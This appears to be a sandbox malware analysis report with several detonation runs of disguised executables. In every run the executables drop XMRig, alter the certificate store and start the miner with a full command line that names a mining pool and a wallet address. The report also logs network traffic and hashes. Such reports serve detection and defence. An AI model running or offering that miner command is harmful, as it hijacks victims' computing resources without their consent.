memory/1044-38-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-39-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-40-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-41-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-42-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-43-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-44-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-45-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-46-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-47-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-48-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-49-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-50-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-51-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-52-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-53-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-54-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-55-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-56-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-57-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-58-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-59-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-60-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-61-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-62-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-63-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-64-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-65-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-66-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-67-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-68-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-69-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-70-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-71-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-72-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-73-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-74-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-75-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-76-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-77-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-78-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-79-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-80-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-81-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-82-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-83-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-84-0x00007FF653D20000-0x00007FF654823000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-05-22 15:12
Reported
2024-05-22 16:22
Platform
win10v2004-20240508-en
Max time kernel
1797s
Max time network
1786s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [blob omitted: identical to the AuthRoot certificate blob recorded for this key above] | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [blob omitted: identical to the AuthRoot certificate blob recorded for this key above] | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3556 wrote to memory of 1980 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3556 wrote to memory of 1980 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| NL | 23.62.61.185:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 185.61.62.23.in-addr.arpa | udp |
| NL | 23.62.61.185:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.16.208.104.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/1980-16-0x000002184BFA0000-0x000002184BFC0000-memory.dmp
memory/1980-17-0x000002184BFF0000-0x000002184C010000-memory.dmp
memory/1980-18-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-20-0x000002184C030000-0x000002184C050000-memory.dmp
memory/1980-19-0x000002184C010000-0x000002184C030000-memory.dmp
memory/1980-21-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-22-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-25-0x000002184C030000-0x000002184C050000-memory.dmp
memory/1980-24-0x000002184C010000-0x000002184C030000-memory.dmp
memory/1980-23-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-26-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-27-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-28-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-29-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-30-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-31-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-32-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-33-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-34-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-35-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-36-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-37-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-38-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-39-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-40-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-41-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-42-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-43-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-44-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-45-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-46-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-47-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-48-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-49-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-50-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-51-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-52-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-53-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-54-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-55-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-56-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-57-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-58-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-59-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-60-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-61-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-62-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-63-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-64-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-65-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-66-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-67-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-68-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-69-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-70-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-71-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-72-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-73-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-74-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-75-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-76-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-77-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-78-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-79-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-80-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-81-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-82-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-83-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-84-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2024-05-22 15:12
Reported
2024-05-22 16:22
Platform
win10v2004-20240508-en
Max time kernel
1794s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [blob omitted: identical to the AuthRoot certificate blob recorded for this key above] | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [blob omitted: identical to the AuthRoot certificate blob recorded for this key above] | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3932 wrote to memory of 2920 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3932 wrote to memory of 2920 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.117.168.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Analysis: behavioral13
Detonation Overview
| Submitted | 2024-05-22 15:12 |
| Reported | 2024-05-22 16:22 |
| Platform | win10v2004-20240426-en |
| Max time kernel | 1793s |
| Max time network | 1787s |
| Command Line | |
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2468 wrote to memory of 3040 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2468 wrote to memory of 3040 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Analysis: behavioral16
Detonation Overview
| Submitted | 2024-05-22 15:12 |
| Reported | 2024-05-22 16:24 |
| Platform | win10v2004-20240508-en |
| Max time kernel | 1793s |
| Max time network | 1795s |
| Command Line | |
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
